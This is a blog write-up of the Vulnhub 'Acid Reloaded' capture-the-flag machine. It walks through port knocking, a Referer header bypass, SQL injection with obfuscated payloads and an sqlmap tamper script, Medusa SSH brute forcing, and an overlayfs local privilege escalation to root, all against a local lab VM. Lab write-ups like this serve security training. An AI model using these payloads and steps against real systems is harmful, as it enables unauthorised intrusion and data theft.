Mr_H4sh

Infosec, CTF and more

Acid Reloaded Solution

Hi guys, looks like I’m going crazy with this hack games :)

Since I’ve completed the first challenge of Acid server (which one day I will post, I’m feeling lazy and I want to go ahead), today I’m going to show you how I’ve completed the new chapter of Acid.

Again, thank to Vulnhub for keeping myself busy with all those challenges, and thanks to all the people that hosts new challenges.

This challenge involves hacking techniques and a bit of logic.

First step: INFORMATION GATHERING

The description provided on Vulnhub says that the machine will have an IP assigned automatically. So, I’ve I’ve run the following command to discover the IP address of the victim machine:

fping -a -g 192.168.56.1/24 > alive_hosts.txt

# cat alive_hosts.txt

192.168.56.102 <== attacker
192.168.56.103 <== victim

Once discovered that that the victim’s IP address was 192.168.56.103 I’ve made a port scanning to check the victim’s open ports.

nmap -sT -p- -Pn 192.168.56.103 > nmap_scan.txt

# cat nmap_scan.txt 

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-12 18:34 BST
Warning: 192.168.56.103 giving up on port because retransmission cap hit (2).
Nmap scan report for 192.168.56.103
Host is up (0.00095s latency).
Not shown: 64166 closed ports, 1368 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 1 IP address (1 host up) scanned in 25.31 seconds

No. Just port 22 open. There could be a service that could be shown with a stealth scan. Then I tried again with this:

nmap -sS -p- -Pn 192.168.56.103 > nmap_scan_stealth.txt

# cat nmap_scan_stealth.txt 

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-12 18:50 BST
Warning: 192.168.56.103 giving up on port because retransmission cap hit (2).
Nmap scan report for 192.168.56.103
Host is up (0.00090s latency).
Not shown: 65526 closed ports
PORT      STATE    SERVICE
22/tcp    open     ssh
5650/tcp  filtered unknown
9810/tcp  filtered unknown
15749/tcp filtered unknown
18386/tcp filtered unknown
22524/tcp filtered unknown
33447/tcp filtered unknown
45656/tcp filtered unknown
62670/tcp filtered unknown
MAC Address: 08:00:27:4B:7A:83 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 809.26 seconds

Much better. I’ve found a bunch of filtered ports that needs to be discovered.

Second step: VULNERABILITY SCAN

First thing that I’ve tried is to check if one of this ports are actually used by an application server.

Nothing, all the ports were filtered and either with telnet or curl I was retrieving a connection refused.

Last resort: open port 22, so ssh.

The welcome message says:

# ssh 192.168.56.103
The authenticity of host '192.168.56.103 (192.168.56.103)' can't be established.
ECDSA key fingerprint is a0:a6:52:fb:2c:32:b7:08:b4:ed:61:1d:2d:fa:c8:58.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.103' (ECDSA) to the list of known hosts.
    _    ____ ___ ____        ____  _____ _     ___    _    ____  _____ ____  
   / \  / ___|_ _|  _ \      |  _ \| ____| |   / _ \  / \  |  _ \| ____|  _ \ 
  / _ \| |    | || | | |_____| |_) |  _| | |  | | | |/ _ \ | | | |  _| | | | |
 / ___ \ |___ | || |_| |_____|  _ <| |___| |__| |_| / ___ \| |_| | |___| |_| |
/_/   \_\____|___|____/      |_| \_\_____|_____\___/_/   \_\____/|_____|____/ 

									-by Acid

Wanna Knock me out ??? 
3.2.1 Let's Start the Game.
                                                                              
root@192.168.56.103's password:

I love subliminal messages. It’s a reference to the port knocking. In case you have no idea of what I’m talking about, then read more about how to hide ssh with port knocking, or just check this

So, I’ve run this command

for x in 3 2 1; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x 192.168.56.103; done

P.S. If you’re using Virtualbox, please be sure that you’re using just Host-only Adapter, otherwise the knock will fail. Don’t know why, but as soon as I’ve changed it the port was open.

After knocking I’ve run nmap again to check what was changed, and this is what I’ve found:

# nmap -sS -p- -Pn 192.168.56.103 > nmap_scan_stealth_2.txt

# cat nmap_scan_stealth_2.txt

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-12 22:01 BST
Nmap scan report for 192.168.56.103
Host is up (0.014s latency).
Not shown: 65533 closed ports
PORT      STATE    SERVICE
22/tcp    open     ssh
33447/tcp open 	   unknown
MAC Address: 08:00:27:4B:7A:83 (Cadmus Computer Systems)
Nmap done: 1 IP address (1 host up) scanned in 788.71 seconds

Aaaaaand another port open, the 33447. What is it? I made a telnet connection and I’ve found out that it was an application server port. I’ve opened it on a browser and this is what I’ve found:

useit

Third step: WEB VULNERABILITY SCAN

Once I’ve found the webpage I’ve started looking for some web vulnerabilities. The source code of the page had nothing strange, no “helping” page title, no cookies, just the background image. Since in the previous chapter of Acid the background image had some hidden hints, I wanted to check if there were something in the metadata of the image, or just in the image. Nothing at all.

So, Dirbuster has always been my friend.

DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Sun Sep 13 15:44:09 BST 2015
--------------------------------

http://192.168.56.103:33447
--------------------------------
Directories found during testing:

Dirs found with a 403 response:

/images/
/icons/
/html/
/icons/small/
/bin/crack/
/css/
/bin/crack/css/
/bin/css/
/bin/includes/
/bin/crack/js/
/bin/js/
/bin/styles/
/server-status/

Dirs found with a 200 response:

/
/bin/


--------------------------------
Files found during testing:

Files found with a 200 responce:

/index.html
/icons/README.html
/bin/index.php
/bin/crack/license.txt
/bin/crack/README.txt
/bin/error.php
/bin/dashboard.php
/bin/includes/functions.php

Files found with a 302 responce:

/bin/includes/logout.php
/bin/includes/validation.php

That /bin folder looks cool, right?

This is what the page that I’ve seen on http://192.168.56.103/bin/ logical-login

A login page. “Be Logical Here” was the head of the page. I saw from the source that there wew a script into crack/js/index.js. From the scan there were also a folder called /bin/crack (strange that Disbuster didn’t find the folder js within). Also I’ve noticed that there were also a file called /bin/crack/README.txt. It was a reference to a codepen, with this link. And the javascript breaks because JQuery was missing. No worries, it was just a dead end.

Tried with SQL Injection, Blind SQL Injection. Nothing.

There were also /bin/dashboard.php,, and it was a page with a funny meme. It was explicitely saying that I wasn’t authorized to access to that page. After few attempts, I’ve decided to try with headers ;)

I’m a big fan of Firefox, and there are plugins that I’ve been using for ages. One of them is the add-on Live HTTP Headers. And this is what I’ve done: replay the request of /bin/dashboard.php adding as referer the page /bin/includes/validation.php

referer-login

Host: 192.168.56.103:33447
Referer: http://192.168.56.103:33447/bin/includes/validation.php
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sec_session_id=b20f38tba6b6dmlrssb05hb2p5
Connection: keep-alive
Cache-Control: max-age=0

So, I’ve clicked on the link and it has shown me the page /bin/l33t_haxor.php with just an image: l33t_haxor

Fourth step: EXPLOITATION

I had a look at the source, and I’ve found

<a href="l33t_haxor.php?id=" style="text-decoration:none"></a>

and guess what? It’s vulnerable to SQL Injection, but it’s a tricky one. I’ve noticed that the page will return a message whenever I’ve added an id between 1 and 11, but I’ve got a SQL error when I’ve added just a ‘. Did I mention that it’s a tricky one? Well, it is because whenever I’ve written a SQL Injection with a space or a + it returned an image saying HACKER DETECTED. So, I needed to use a SQLi Obfuscation technique to execute the query, or just use a SQL Scanner like sqlmap.

sqlmap is a great tool, and you can use tamper scripts for tricky queries like this one. Since the query was failing with spaces, I’ve changed the spaces with a comment using a tamper script called space2comment. On this website you can find a lot of tamper scripts for sqlmap.

So, this is the command I’ve used to exploit the query:

sqlmap -u "http://192.168.56.103:33447/bin/l33t_haxor.php?id=1" --dbs --dbms=MySQL -p "id" --tamper=space2comment

And this is what I’ve discovered:

sqlmap identified the following injection point(s) with a total of 68 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1') AND 1759=1759 AND ('VXfN'='VXfN

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1') AND (SELECT 7505 FROM(SELECT COUNT(*),CONCAT(0x7170716271,(SELECT (ELT(7505=7505,1))),0x7171706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('eIur'='eIur

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=1') AND (SELECT * FROM (SELECT(SLEEP(5)))ZJVJ) AND ('VwSR'='VwSR

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=-8891') UNION ALL SELECT NULL,CONCAT(0x7170716271,0x766e6b53666867747a4c,0x7171706a71)#
---
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.10
back-end DBMS: MySQL 5.0
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] secure_login

Cool, something told me that maybe the secure_login database might be useful.

Believe me, it took a very long time to discover the right SQL Injection. This website helped me a lot. To make your life easier, this is the SQL Injection that I’ve executed:

http://192.168.56.103:33447/bin/l33t_haxor.php?id=10%27%29/**/UNION/**/ALL/**/%28SELECT%28NULL%29,GROUP_CONCAT%28DISTINCT%28TABLE_NAME%29%29FROM%28INFORMATION_SCHEMA.COLUMNS%29WHERE%28TABLE_SCHEMA%29=%27secure_login%27AND%271%27=%271

and this is what I’ve retrieved:

UB3R/strcpy.exe,login_attempts,members,word

UB3R/strcpy.exe it’s a link, indeed I’ve downloaded the file strcpy.exe from http://192.168.56.103:33447/UB3R/strcpy.exe.

Looks like that the file is a PDF:

# file strcpy.txt

strcpy.exe: PDF document, version 1.5

But when I was going to open the file, the suggestion of the right click on Kali was to “Open with Archive Manager”…and guess what?

hidden-into-pdf

This was the content of the file acid.txt:

You are at right track.

Don't loose hope..

Good Luck :-)

Kind & Best Regards,
Acid 

The right track? I’ve just extracted the file. So, the file was containing another file within.

After a bit of analysis, I’ve started carving the file with foremost, and this is what I’ve found:

# foremost lol.jpg 
Processing: lol.jpg
|*|
# ls -l output/
audit.txt  jpg/       rar/       
# ls -l output/rar/00000117.rar 
-rw-r--r-- 1 root root 941 Sep 16 21:20 output/rar/00000117.rar

# unrar e output/rar/00000117.rar
UNRAR 5.21 freeware      Copyright (c) 1993-2015 Alexander Roshal


Extracting from output/rar/00000117.rar

Extracting  Avinash.contact                                           OK 
Extracting  hint.txt                                                  OK 
All OK

Bingo, two files extracted. This is the content of the file hint.txt:

You have found a contact. Now, go and grab the details :-)

And this is the content of the file Avinash.contact

<?xml version="1.0" encoding="UTF-8"?>
<c:contact c:Version="1" xmlns:c="http://schemas.microsoft.com/Contact" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:MSP2P="http://schemas.microsoft.com/Contact/Extended/MSP2P" xmlns:MSWABMAPI="http://schemas.microsoft.com/Contact/Extended/MSWABMAPI">
    <c:CreationDate>2015-08-23T11:39:18Z</c:CreationDate>
    <c:Extended>
        <MSWABMAPI:PropTag0x3A58101F c:ContentType="binary/x-ms-wab-mapi" c:type="binary">
            AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=
        </MSWABMAPI:PropTag0x3A58101F>
    </c:Extended>
    <c:ContactIDCollection>
        <c:ContactID c:ElementID="599ef753-f77f-4224-8700-e551bdc2bb1e">
            <c:Value>0bcf610e-a7be-4f26-9042-d6b3c22c9863</c:Value>
        </c:ContactID>
    </c:ContactIDCollection>
    <c:EmailAddressCollection>
        <c:EmailAddress c:ElementID="0745ffd4-ef0a-4c4f-b1b6-0ea38c65254e">
            <c:Type>SMTP</c:Type>
            <c:Address>acid.exploit@gmail.com</c:Address>
            <c:LabelCollection>
                <c:Label>Preferred</c:Label>
            </c:LabelCollection>
        </c:EmailAddress>
        <c:EmailAddress c:ElementID="594eec25-47bd-4290-bd96-a17448f7596a" xsi:nil="true"/>
    </c:EmailAddressCollection>
    <c:NameCollection>
        <c:Name c:ElementID="318f9ce5-7a08-4ea0-8b6a-2ce3e9829ff2">
            <c:FormattedName>Avinash</c:FormattedName>
            <c:GivenName>Avinash</c:GivenName>
        </c:Name>
    </c:NameCollection>
    <c:PersonCollection>
        <c:Person c:ElementID="865f9eda-796e-451a-92b1-bf8ee2172134">
            <c:FormattedName>Makke</c:FormattedName>
            <c:LabelCollection>
                <c:Label>wab:Spouse</c:Label>
            </c:LabelCollection>
        </c:Person>
    </c:PersonCollection>
    <c:PhotoCollection>
        <c:Photo c:ElementID="2fb5b981-cec1-45d0-ae61-7c340cfb3d72">
            <c:LabelCollection>
                <c:Label>UserTile</c:Label>
            </c:LabelCollection>
        </c:Photo>
    </c:PhotoCollection>
</c:contact>

From this file I’ve extracted the following informations:

- AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA= (which is an encoded string in Base64 of NooB@123) 
- 0bcf610e-a7be-4f26-9042-d6b3c22c9863
- acid.exploit@gmail.com
- Avinash
- Makke

Smells like ssh, also because I had no luck with the login page. So, ssh bruteforcer! The one that I’ve used is Medusa. So, I’ve created a list of users and a list of passwords with the informations retrieved:

# cat userlist.txt
NooB@123
Avinash
Makke
acid.exploit
avinash
makke
noob@123

# cat passwordlist.txt
AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA= 
NooB@123
0bcf610e-a7be-4f26-9042-d6b3c22c9863
acid.exploit@gmail.com
Avinash
Makke

# medusa -h 192.168.56.103 -U userlist.txt -P passwordlist.txt -M ssh
Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: NooB@123 (1 of 7, 0 complete) Password: AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=  (1 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: NooB@123 (1 of 7, 0 complete) Password: NooB@123 (2 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: NooB@123 (1 of 7, 0 complete) Password: 0bcf610e-a7be-4f26-9042-d6b3c22c9863 (3 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: NooB@123 (1 of 7, 0 complete) Password: acid.exploit@gmail.com (4 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: NooB@123 (1 of 7, 0 complete) Password: Avinash (5 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: NooB@123 (1 of 7, 0 complete) Password: Makke (6 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: Avinash (2 of 7, 1 complete) Password: AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=  (1 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: Avinash (2 of 7, 1 complete) Password: NooB@123 (2 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: Avinash (2 of 7, 1 complete) Password: 0bcf610e-a7be-4f26-9042-d6b3c22c9863 (3 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: Avinash (2 of 7, 1 complete) Password: acid.exploit@gmail.com (4 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: Avinash (2 of 7, 1 complete) Password: Avinash (5 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: Avinash (2 of 7, 1 complete) Password: Makke (6 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: Makke (3 of 7, 2 complete) Password: AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=  (1 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: Makke (3 of 7, 2 complete) Password: NooB@123 (2 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: Makke (3 of 7, 2 complete) Password: 0bcf610e-a7be-4f26-9042-d6b3c22c9863 (3 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: Makke (3 of 7, 2 complete) Password: acid.exploit@gmail.com (4 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: Makke (3 of 7, 2 complete) Password: Avinash (5 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: Makke (3 of 7, 2 complete) Password: Makke (6 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: acid.exploit (4 of 7, 3 complete) Password: AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=  (1 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: acid.exploit (4 of 7, 3 complete) Password: NooB@123 (2 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: acid.exploit (4 of 7, 3 complete) Password: 0bcf610e-a7be-4f26-9042-d6b3c22c9863 (3 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: acid.exploit (4 of 7, 3 complete) Password: acid.exploit@gmail.com (4 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: acid.exploit (4 of 7, 3 complete) Password: Avinash (5 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: acid.exploit (4 of 7, 3 complete) Password: Makke (6 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: avinash (5 of 7, 4 complete) Password: AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=  (1 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: avinash (5 of 7, 4 complete) Password: NooB@123 (2 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: avinash (5 of 7, 4 complete) Password: 0bcf610e-a7be-4f26-9042-d6b3c22c9863 (3 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: avinash (5 of 7, 4 complete) Password: acid.exploit@gmail.com (4 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: avinash (5 of 7, 4 complete) Password: Avinash (5 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: avinash (5 of 7, 4 complete) Password: Makke (6 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: makke (6 of 7, 5 complete) Password: AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=  (1 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: makke (6 of 7, 5 complete) Password: NooB@123 (2 of 6 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.56.103 User: makke Password: NooB@123 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: noob@123 (7 of 7, 6 complete) Password: AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=  (1 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: noob@123 (7 of 7, 6 complete) Password: NooB@123 (2 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: noob@123 (7 of 7, 6 complete) Password: 0bcf610e-a7be-4f26-9042-d6b3c22c9863 (3 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: noob@123 (7 of 7, 6 complete) Password: acid.exploit@gmail.com (4 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: noob@123 (7 of 7, 6 complete) Password: Avinash (5 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: noob@123 (7 of 7, 6 complete) Password: Makke (6 of 6 complete)

Did you notice anything?

Well, exactly!

ACCOUNT FOUND: [ssh] Host: 192.168.56.103 User: makke Password: NooB@123 [SUCCESS]

So, once I got in I’ve found a hidden file called .hint

ssh makke@192.168.56.103
    _    ____ ___ ____        ____  _____ _     ___    _    ____  _____ ____  
   / \  / ___|_ _|  _ \      |  _ \| ____| |   / _ \  / \  |  _ \| ____|  _ \ 
  / _ \| |    | || | | |_____| |_) |  _| | |  | | | |/ _ \ | | | |  _| | | | |
 / ___ \ |___ | || |_| |_____|  _ <| |___| |__| |_| / ___ \| |_| | |___| |_| |
/_/   \_\____|___|____/      |_| \_\_____|_____\___/_/   \_\____/|_____|____/ 

                                    -by Acid

Wanna Knock me out ??? 
3.2.1 Let's Start the Game.
                                                                              
makke@192.168.56.103's password: 
Welcome to Ubuntu 15.04 (GNU/Linux 3.19.0-15-generic i686)

 * Documentation:  https://help.ubuntu.com/

Last login: Thu Sep 17 02:51:37 2015 from 192.168.56.102
makke@acid:~$ ls -la
total 32
drwxr-xr-x 3 makke makke 4096 Aug 24 21:28 .
drwxr-xr-x 4 root  root  4096 Aug 24 19:11 ..
-rw------- 1 makke makke  225 Sep 17 02:52 .bash_history
-rw-r--r-- 1 makke makke  220 Aug 24 19:11 .bash_logout
-rw-r--r-- 1 makke makke 3760 Aug 24 19:11 .bashrc
drwx------ 2 makke makke 4096 Aug 24 21:25 .cache
-rw-rw-r-- 1 makke makke   40 Aug 24 21:28 .hint
-rw-r--r-- 1 makke makke  675 Aug 24 19:11 .profile
makke@acid:~$ cat .hint
Run the executable to own kingdom :-)

I’m not quite the meaning of that, but one of my habbits is to check the history of commands of the user:

makke@acid:~$ history
    1  exit
    2  cd ..
    3  clear
    4  cd /
    5  ls
    6  cd bin/
    7  clear
    8  ./overlayfs 
    9  clear
   10  cd /home/makke/
   11  clear
   12  nano .hint
   13  clear
   14  ls
   15  clear
   16  ls
   17  ls -a
   18  cat .hint 
   19  clear
   20  cd /bin/
   21  ls
   22  ./overlayfs 
   23  clear
   24  wgt
   25  wget
   26  apt-get remove wget
   ...

What is this?

20  cd /bin/
21  ls
22  ./overlayfs 

Interesting, an executable…

I had a look on Wikipedia, then I’ve executed it:

makke@acid:/bin$ ./overlayfs 
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami    
root

Yes! Holy words!

I carried on investigating on the /root folder, and then I’ve found the flag!

# pwd
/bin
# cd /root  
# ls -l
total 0
# ls -la
total 68
drwx------  5 root root  4096 Aug 24 21:32 .
drwxr-xr-x 22 root root  4096 Aug 24 20:58 ..
-rw-------  1 root root 23934 Aug 24 22:25 .bash_history
-rw-r--r--  1 root root  3135 Aug  8 18:02 .bashrc
drwx------  2 root root  4096 Aug 24 17:46 .cache
drwx------  3 root root  4096 Aug  6 17:55 .config
drwx------  3 root root  4096 Aug  6 15:51 .dbus
-rw-r--r--  1 root root   284 Aug 24 20:57 .flag.txt
-rw-------  1 root root  2775 Aug 24 21:32 .mysql_history
-rw-------  1 root root   147 Aug 24 23:32 .nano_history
-rw-r--r--  1 root root   140 Feb 20  2014 .profile
-rw-r--r--  1 root root    66 Aug  6 17:31 .selected_editor
# cat .flag.txt 
Dear Hax0r,

You have completed the Challenge Successfully.

Your Flag is : "Black@Current@Ice-Cream"

Kind & Best Regards

-ACiD

Twitter:https://twitter.com/m_avinash143
Facebook: https://www.facebook.com/M.avinash143
LinkedIN: https://in.linkedin.com/pub/avinash-thapa/101/406/4b5
# 

Conclusion

I must say that this CTF wasn’t so easy. It was pretty much different from the first chapter where the root password has always been under my nose :) But it’s been challenging, and I had a lot of fun completing it :) Thank you Avinash.

As usual, for any information or comment, please do not hesitate to leave a comment.

./A